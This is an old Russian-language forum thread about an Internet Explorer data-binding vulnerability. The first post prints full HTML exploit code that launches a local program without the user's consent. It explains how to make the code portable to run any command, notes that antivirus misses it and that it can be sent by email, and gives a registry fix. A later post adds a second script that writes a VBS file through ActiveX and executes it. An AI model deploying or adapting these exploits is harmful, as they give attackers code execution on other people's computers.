![]() |
![]() | #1 |
Moderator Join Date: 09 2001 Location: South Korea, Gumi
Posts: 7,699
Blog Entries: 16 Downloads: 102 Uploads: 34
Reputation: 561 | 6 | ![]()
Израильские специалисты по компьютерной безопасности обнаружили весьма серьезную уязвимость в браузере IE. С её помощью на удаленной машине можно запустить любую программу, причем без использования скриптов и ActiveX. Задействовать её можно с помощью следующего HTML-кода: <blockquote><font size="1" face="MS Sans Serif, Verdana, Helvetica, sans-serif">code:</font><hr><pre> <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span><xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/winmine.exe"></object> ]]> </exploit> </security> </xml> </pre><hr></blockquote> Данный код можно скопировать в блокнот и сохранить в файл с расширением .html. Если этот файл будет открыт в IE, автоматически запустится игра САПЁР но запустить можно любую программу и команду что делает эту уязвимость просто ужасной. Если внести в код маленькие изменения и внедрить переменную в пути исполняемой программы а не использовать абсолютные пути [c:/windows/system32/winmine.exe] на исполнение команд, то запуск программ обеспечен на любых компьютерах с операционными системами Windows. Уязвимость присутствует во всех версиях IE, так как используется функция "data binding", введенная еще в IE4. Посмотреть на действие этого кода можно http://acid.land.am/koshmar.html. От редакции: предполагается что у вас виндавоз находится в каталоге c:\windows Просто без вашего разрешения запустится игра "САПЁР" AVP ругается на этот код и говорит что есть подозрение на Exploit.CodeBaseExec но в данном случае это не вирус! NAV и другие антивирусы вообще не реагируют на этот код ![]() Для запрета исполнения данного кода необходимо внести маленькие изменения в системный регистр, находим следующую ветку в регистре: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 и меняем значение для "1004" с dword:00000000 на dword:00000003 Для того чтобы внесённые изменения вступили в силу перезагрузите компьютер. И все. На всякий случай не открывайте подобные демонстрационные странички в Интернете или в сомнительных местах и не выключайте AVP Monitor не известно что могут разместить на подобных страницах не порядочные люди.... Самое страшное это то что данный код можно пересылать по электронной почте в HTML коде ![]() ::::::::::: По материалам сайта http://www.compulenta.ru |
![]() |
![]() | #2 |
Студент Join Date: 01 2002 Location: Zimbabwe
Posts: 268
Downloads: 0 Uploads: 0
Reputation: 0 | 0 | ![]()
A u menya nichego ne proizhoslo <img src="sad-2.gif" border="0"> ..Potomu shto u menya XP na E: a na c: Me.Poetomu iz XP u menya nichego ne otkrilos <img src="biggrin2.gif" border="0"> No kak toko ya pomenyal c:/ na E:/ to srazu otkrilos..A vabshe cool thing :!!!
__________________ Things will never be the same again.... |
![]() |
![]() | #3 |
Консервативн Join Date: 01 2002 Location: Кавказская Албания
Posts: 889
Downloads: 0 Uploads: 0
Reputation: 0 | 0 | ![]()
Xocu privesti eshe odin code dly ie, updati na etot bug mojno skachat' s windowsupdate <blockquote><font size="1" face="MS Sans Serif, Verdana, Helvetica, sans-serif">code:</font><hr><pre> <applet code="com.ms.activeX.ActiveXComponent" align="baseline" width="0" height="128" highlight="0"> </applet> <script language="JAVASCRIPT"> <!-- hide for safe browsers InterfaceObject=document.applets[0]; setTimeout("Upload()",1000); function Upload() { fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}"; InterfaceObject.setCLSID(fsoClassID); fso = InterfaceObject.createInstance(); // windir = fso.getspecialfolder(0); filename = "\\vbstest.vbs"; file = fso.opentextfile(filename, "2", "TRUE"); file.writeline(filecontent1) file.close(); Run(); } function Run() { WshShellClassID="{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"; InterfaceObject.setCLSID(WshShellClassID); wshShell = InterfaceObject.createInstance(); wshShell.run(filename,"6","TRUE"); } --> </script> <script language="vbscript"> a=chr(34) filecontent1="msgbox "&a&"You are vulnerable to Internet Explorer exploits!"&a&",16,"&a&"WARNING"&a&"" </script> </pre><hr></blockquote>
__________________ Праздник к нам приходит... |^^^^^^^^^'''^\| ||\__ | ВОДКА-ВОДКА | ||','''|'''''''\_____,_ | _..... _ | ||_ _|'__|_____||.........| | '(@)'(@)'(@)''''''''''''''''''''''*|(@)""""|(@)* |
![]() |
![]() | #4 |
Младенец Join Date: 03 2002 Location: Yerevan
Posts: 28
Downloads: 0 Uploads: 0
Reputation: 0 | 0 | ![]() ![]() inch verabervum e windows XP-i E: partitioni vra gtnvelun, apa miayn lammernern en grum "c:\windows ..." kareli e ogragorcel parzapes %windir% kam %systemdir% [email protected] u [email protected] [email protected] kgtni inch vor iren petq e ![]() |
![]() |
Sponsored Links |